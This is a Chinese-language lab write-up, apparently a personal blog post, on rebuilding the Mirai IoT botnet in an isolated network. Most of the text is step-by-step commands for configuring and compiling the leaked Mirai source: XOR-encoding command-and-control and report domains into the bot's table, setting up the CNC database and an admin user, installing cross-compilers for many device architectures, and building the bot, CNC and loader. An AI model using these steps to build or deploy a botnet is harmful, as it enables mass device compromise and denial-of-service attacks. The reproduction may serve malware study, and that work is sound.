介绍
内网环境复现Mirai平台攻击,记录一下我的Mirai平台踩坑过程
Mirai平台下载地址
Mirai平台介绍
测试环境搭建过程
测试环境
ubuntu16.04(主控服务器/客户端)
IP:192.168.3.34
kali2019(DNS解析/靶机)
IP:192.168.3.36
Mirai平台的搭建过程
虚拟机常规安装操作
虚拟机的一些简单的常规操作,更换国内源和安装tools
sudo apt install vim
vim /etc/apt/sources.list
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-updates main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-updates main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-backports main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-backports main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-security main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ xenial-security main restricted universe multiverse
sudo apt update
sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
kali虚拟机配置同理
Mirai前提环境配置
从这里正式开始对Mirai平台的安装
首先安装前置环境
sudo apt update
sudo apt install git
sudo apt install gcc
sudo apt install build-essential
sudo apt install electric-fence
安装golang出现了问题一,网上教程是直接安装
ubuntu默认安装1.6版本,我在后面进行go get测试时出现了问题
sudo apt install golang
我在测试时使用环境为go 1.10
如果已经下载了go 1.6版本可以执行卸载命令(如果没有下载则忽视这步)
sudo apt remove golang-go
从官网下载go 1.10 版本linux平台的源码包并解压
root@ubuntu:/home/test/Desktop# wget https://dl.google.com/go/go1.10.linux-amd64.tar.gz
sudo tar zxvf go1.10.linux-amd64.tar.gz -C /usr/local
安装数据库,可能会没有提示输入密码,安装号之后进不了数据库
sudo apt install mysql-server mysql-client
设置数据库密码 123456
如果安装时没有提示输入密码,可以查看默认debian.cnf
sudo vim /etc/mysql/debian.cnf
# Automatically generated for Debian scripts. DO NOT TOUCH!
[client]
host = localhost
user = debian-sys-maint
password = xxxxxxx
socket = /var/run/mysqld/mysqld.sock
[mysql_upgrade]
host = localhost
user = debian-sys-maint
password =
socket = /var/run/mysqld/mysqld.sock
到此前提环境安装完毕
kali配置DNS服务器
DNS搭建我测试了两种方法,分别使用bind9和dnsmasq
经过比较感觉dnsmasq更加简单一些,这里详细介绍一下使用dnsmasq配置DNS
安装命令
sudo apt install dnsmasq
修改配置文件,我使用的域名为test.me
vim /etc/dnsmasq.conf
resolv-file=/etc/resolv.conf #设置resolv目录
strict-order #严格按照从上到下选择dns
listen-address=192.168.3.36 #这个ip是我的kali机器,如果只想本地访问可以改为127.0.0.1
address=/test.me/192.168.3.34 #这里将test.me指向192.168.3.34
address=/cnc.test.me/192.168.3.34
address=/report.test.me/192.168.3.34
server=8.8.8.8 #设置google dns为第一指向dns
server=114.114.114.114
重启服务
service dnsmasq restart
验证是否搭建成功,在kali和ubuntu上使用nslook命令,ubuntu测试前记得重新配置一下dns
nslookup
> test.me
Server: 192.168.3.36
Address: 192.168.3.36#53
Name: test.me
Address: 192.168.3.34
> cnc.test.me
Server: 192.168.3.36
Address: 192.168.3.36#53
Name: cnc.test.me
Address: 192.168.3.34
> report.test.me
Server: 192.168.3.36
Address: 192.168.3.36#53
Name: report.test.me
Address: 192.168.3.34
对源码进行编译和参数配置
下载Mirai平台
git clone https://github.com/jgamblin/Mirai-Source-Code
编译enc可执行文件,用于地址异或
root@ubuntu:/home/test/Desktop# cd Mirai-Source-Code/mirai/tools/
gcc enc.c -o enc.out
配置cnc文件,这里使用test.me域名
我曾经使用过纯IP配置cnc,同样提示无法解析域名,这个问题目前我还没有明白是什么原因造成。
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/tools# ./enc.out string test.me
XOR'ing 8 bytes of data...
\x56\x47\x51\x56\x0C\x4F\x47\x22
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/tools# ./enc.out string cnc.test.me
XOR'ing 12 bytes of data...
\x41\x4C\x41\x0C\x56\x47\x51\x56\x0C\x4F\x47\x22
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/tools# ./enc.out string report.test.me
XOR'ing 15 bytes of data...
\x50\x47\x52\x4D\x50\x56\x0C\x56\x47\x51\x56\x0C\x4F\x47\x22
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/tools# vim ../bot/table.c
修改第18行和21行
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x56\x47\x51\x56\x0C\x4F\x4 7\x22", 30); // cnc.changeme.com
add_entry(TABLE_CNC_PORT, "\x22\x35", 2); // 23
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x56\x47\x5 1\x56\x0C\x4F\x47\x22", 29); // report.changeme.com
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2); // 48101
配置数据库文件,修改db.sql文件
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/tools# cd ../../scripts/
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# vim db.sql
CREATE DATABASE mirai;
use mirai;
CREATE TABLE `history` (
修改完成之后启动数据库,将db.sql文件导入到数据库中
这里我的数据库用户为root,密码为123456
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# service mysql start
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# cat db.sql | mysql -uroot -p
Enter password: 123456
在数据库中添加mirai用户,这里账号密码可以随意设置
用户账号:mirai-user
用户密码:mirai-pass
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.7.29-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use mirai;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');
Query OK, 1 row affected (0.00 sec)
mysql> exit
修改mirai/cnc/main.go中的数据库常量
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# vim ../mirai/cnc/main.go
将数据库密码修改为当前数据库密码
const DatabaseAddr string = "127.0.0.1" //数据库连接地址
const DatabaseUser string = "root" //数据库用户
const DatabasePass string = "123456" //数据库密码
const DatabaseTable string = "mirai" //数据库名
配置交叉编译环境
数据包的下载网上主要是两种情况,差异主要是对cross-compiler-armv6l.tar.bz2的下载
我推荐下载12个完整数据包
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# cd ..
root@ubuntu:/home/test/Desktop/Mirai-Source-Code# mkdir cross-compmile-bin
root@ubuntu:/home/test/Desktop/Mirai-Source-Code# cd cross-compile-bin/
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
如果下载了11个数据包,需要对cross-compile.sh进行修改将其中armv6l部分删除
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/cross-compile-bin# cd ../scripts/
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/scripts# ./cross-compile.sh
选 n
修改环境变量,如果前面直接使用apt进行golang安装则
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export GOPATH=$HOME/go
mkdir ~/go
source ~/.bashrc
不过我推荐使用go 1.10,据需要在环境变量中重新配置一下
root@ubuntu:/home/test/Desktop# vim ~/.bashrc
export GOROOT=/usr/local/go
export GOPATH=/home/taoyx/program_develop/go_demo
export PATH=$PATH:$GOPATH:/usr/local/go/bin
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
root@ubuntu:/home/test/Desktop# source ~/.bashrc
编译go的相关环境
root@ubuntu:/home/test/Desktop/Mirai-Source-Code# go get github.com/go-sql-driver/mysql
root@ubuntu:/home/test/Desktop/Mirai-Source-Code# go get github.com/mattn/go-shellwords
这里因为是内网环境需要对resolv.c中的DNS参数进行重新配置,否则会出现无法解析域名的情况
将8.8.8.8改成192.168.3.36
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai/bot# vim resolv.c
84 addr.sin_addr.s_addr = INET_ADDR(192,168,3,36);
编译cnc和bot
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/mirai# ./build.sh debug telnet
root@ubuntu:/home/test/Desktop/Mirai-Source-Code/loader# ./build.sh
到此环境搭建完成